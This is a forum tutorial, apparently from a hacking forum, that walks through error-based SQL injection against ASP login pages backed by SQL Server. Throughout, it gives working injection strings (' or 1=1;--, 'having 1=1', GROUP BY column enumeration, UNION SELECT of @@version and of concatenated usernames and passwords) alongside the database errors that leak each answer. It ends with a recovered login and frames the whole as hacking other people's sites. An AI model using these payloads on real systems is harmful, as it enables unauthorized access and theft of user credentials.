MSACCESS [asp] Sql Injection

Ok guys...this is my 2nd tut on hacking asp sites...

This tut is different from MSSQL Sql injection...is more complex but is very interesting and full of knowledge...Those who will understand this can hack the sites that are not hacked by anyone else...:D

So you can basically perform this tut when u get a error like this when u insert a single quotation at the end of the url e.g.

Code:
http://www.target.com/products.asp?id=47'

if u get this error ...this means you can perform this tut on that site...
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string ''.

/products.asp, line 25

So what you will have to do is find a login page...it can be either admin login page or any other login page...I'll prefer you perform this tut on admin login page...

So now many users will be wondering where da hell do we get the admin login page from...just insert admin at the url...mostly admin pages are located over there...e.g.
Code:
http://www.target.com/admin

So you found your admin login page...Now follow the following steps.

Step 1:
Enter something like test’ as the username and anything as the password and try to login. If you get something similar to this:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string 'test' and AuthType=1 and c.CompanyNum=log.CompanyNum'.

/orders/doLogin.asp, line 17
you’ve got yourself a vulnerable form. This error tells us a few things. This is MS SQL Server, and we can see part of the SQL statement in the error. We know the page is not completely protected because if it was, we would not have received an error like this.

Step 2:
Now try to login with these details
Code:
Username : test’ or 1 = 1;--
Password: whatever u want
[Image: 2203074952_64404b3c4a_o.gif]
If you are sent back to the same page...Don't panic...it's normal...if u are logged in...then u r lucky :D

The action that is performing behind this is
Code:
SELECT id FROM TableUsers WHERE Username = 'TextBoxUserName' AND Password = 'TextBoxPassword';
A semi-colon (;) is used to say the statement is over and two hyphens(-) signify that the rest is just a comment and not to process it.

The action will be performing behind is
Code:
SELECT id FROM TableUsers WHERE Username = 'test' OR 1 = 1;--' AND Password = 'TextBoxPassword';
Now try this for username
Code:
Username: test' having 1=1;--
Password: whatever u want
You might get this error
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column '[b]log.Password[/b]' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

/orders/doLogin.asp, line 17
The important part is where it says ‘log.Password’. This lets us know that the first field selected is called Password. Now we simply do a GROUP BY on Password to see the next field selected in the SQL statement, like so:
[Image: 2202285283_4a30a8849a_o.gif]
and we get this error:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'log.CompanyNum' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

/orders/doLogin.asp, line 17
Now insert in username as
Code:
Username: test’ group by Password, CompanyNum having 1 = 1;--
and we get this error
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Ambiguous column name 'CompanyNum'.

/orders/doLogin.asp, line 17
Now insert in username
Code:
Username: test’ group by log.Password, log.CompanyNum, c.CompanyName having 1 = 1;--
You will get this error
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'c.ContractNum' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

/orders/doLogin.asp, line 17
Now insert in username:
Code:
Login: test’ group by log.Password, log.CompanyNum, c.CompanyName, c.ContractNum having 1 = 1;--
No error after this login! You will notice I started using names like log.Password, instead of simply trying Password. I did this because I wanted to avoid an error like Ambiguous column name. This means that there are 2 fields from 2 different tables with the same name.
SQL Query working behind this will be
Code:
SELECT log.Password, log.CompanyNum, c.CompanyName, c.ContractNum FROM tableUsers log, tableCompanies c WHERE log.Username = 'txtBoxUser' AND log.Password = 'txtPassword';--
The next step would be to determine what types of fields are being selected in the statement we are injecting. There are ways to do this, but the quickest way is probably to just guess. Here’s my guesses:

log.Password = VARCHAR (letters, numbers, symbols, etc)
log.CompanyNum = INT (whole numbers only)
c.CompanyName = VARCHAR
c.ContractNum = INT
Now we will check the version of the database using this query
Code:
Username: test’ UNION select 1, @@version, 1, 1;--
And we might get this error:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.

/orders/doLogin.asp, line 17
As you can see in the error above, there was an “error converting the nvarchar value to a column of data type int". I tried to match @@version with log.CompanyNum and created an error to help myself. The error puts, whatever is in the varchar value in single quotes in an error every time we try to convert it. Now we know we are dealing with the older, SQL Server 2000, which is only slightly easier to exploit the SQL Server 2005.

So now we have a way to read data from the database. All we have to do is select the field that we want to read in a union statement and attempt to convert it to an integer by matching it up with an integer in the original statement.

The next thing I would try, since we can’t login with test’ or 1 = 1;–, is to use the convert method to get errors to tell us a username and password. I’ll try logging in with this:
Code:
Username: test’ UNION SELECT 1, log.Password, 1, 1 FROM log;--
we might get this error:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e37'

[Microsoft][ODBC SQL Server Driver][SQL Server]Invalid object name 'log'.

/orders/doLogin.asp, line 17
My Bad Luck...‘log’ is an alias and not the real table name. I will ve to find the real table name...
Ok i guessed the table name that is tblUsers and columns too

Now i will insert this query in the login:
Code:
‘ UNION SELECT 1, Username + ‘:’ +Password, 1, 1 FROM tblUsers;--
we might get this error:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'jsmith:ducks' to a column of data type int.

/orders/doLogin.asp, line 17
As you probably figured out, this error tells me that the username is “jsmith” and the password is “ducks”.

Here you got the username & password of the site....Gud Luck!

Have any difficulties understanding? Contact me here!!! Pirate

NOTE: If you find the above tut difficult...you can follow the following video for Secondary video Tut....
Code:
http://www.hackforums.net/showthread.php?tid=1435888